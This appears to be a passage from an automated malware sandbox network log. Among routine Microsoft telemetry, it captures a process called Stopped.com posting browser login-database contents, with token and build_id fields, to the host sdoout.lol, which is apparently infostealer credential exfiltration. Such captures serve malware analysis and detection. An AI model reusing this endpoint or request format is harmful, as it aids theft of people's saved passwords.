                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                            Cookie: _C_ETH=1; USRLOC=; MUID=2A5E9301422D68911D9D866743856932; _EDGE_S=F=1&SID=12141DD01C6B6C930BE408B61D416DDA; _EDGE_V=1
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:27 UTC3869OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 31 54 31 35 3a 35 39 3a 32 34 2e 34 30 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 64 36 64 35 38 64 61 34 2d 62 39 34 30 2d 34 30 32 63 2d 61 33 38 34 2d 65 66 31 39 63 61 63 38 35 33 39 39 22 2c 22 65 70 6f 63 68 22 3a 22 32 30 30 36 37 38 39 39 36 35 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                            Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-31T15:59:24.400Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"d6d58da4-b940-402c-a384-ef19cac85399","epoch":"2006789965"},"app":{"locale
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:27 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                                                            Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                            P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                            Set-Cookie: MC1=GUID=57a63fceff0c4c69ba41c160cdc22ec1&HASH=57a6&LV=202412&V=4&LU=1735660767452; Domain=.microsoft.com; Expires=Wed, 31 Dec 2025 15:59:27 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                            Set-Cookie: MS0=a4da8b5ce2f9495caa6709b77496875c; Domain=.microsoft.com; Expires=Tue, 31 Dec 2024 16:29:27 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                            time-delta-millis: 3046
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                            Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:27 GMT
                                                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            30192.168.2.550083116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:27 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----2n7glxt2db1dje379hdj
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 68733
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:27 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 32 6e 37 67 6c 78 74 32 64 62 31 64 6a 65 33 37 39 68 64 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 32 6e 37 67 6c 78 74 32 64 62 31 64 6a 65 33 37 39 68 64 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 32 6e 37 67 6c 78 74 32 64 62 31 64 6a 65 33 37 39 68 64 6a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------2n7glxt2db1dje379hdjContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------2n7glxt2db1dje379hdjContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------2n7glxt2db1dje379hdjCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:27 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                                            Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:27 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                                            Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:28 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            31192.168.2.55009520.110.205.1194435136C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC1261OUTGET /c.gif?rnd=1735660764407&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=026bcac3993949958ca71788bb1e040f&activityId=026bcac3993949958ca71788bb1e040f&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=B3DB3A06CBDF43B98D4B58889567A90D&MUID=2A5E9301422D68911D9D866743856932 HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: c.msn.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                            Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                            Cookie: USRLOC=; MUID=2A5E9301422D68911D9D866743856932; _EDGE_S=F=1&SID=12141DD01C6B6C930BE408B61D416DDA; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                            ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                            P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                            Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                            Set-Cookie: MUID=2A5E9301422D68911D9D866743856932; domain=.msn.com; expires=Sun, 25-Jan-2026 15:59:29 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                            Set-Cookie: SRM_M=2A5E9301422D68911D9D866743856932; domain=c.msn.com; expires=Sun, 25-Jan-2026 15:59:29 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                            Set-Cookie: MR=0; domain=c.msn.com; expires=Tue, 07-Jan-2025 15:59:29 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                            Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Tue, 31-Dec-2024 16:09:29 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:29 GMT
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                            Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            32192.168.2.550102116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----us0r9ri58ym7ymglx4w4
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 262605
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 75 73 30 72 39 72 69 35 38 79 6d 37 79 6d 67 6c 78 34 77 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 75 73 30 72 39 72 69 35 38 79 6d 37 79 6d 67 6c 78 34 77 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 75 73 30 72 39 72 69 35 38 79 6d 37 79 6d 67 6c 78 34 77 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------us0r9ri58ym7ymglx4w4Content-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------us0r9ri58ym7ymglx4w4Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------us0r9ri58ym7ymglx4w4Cont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
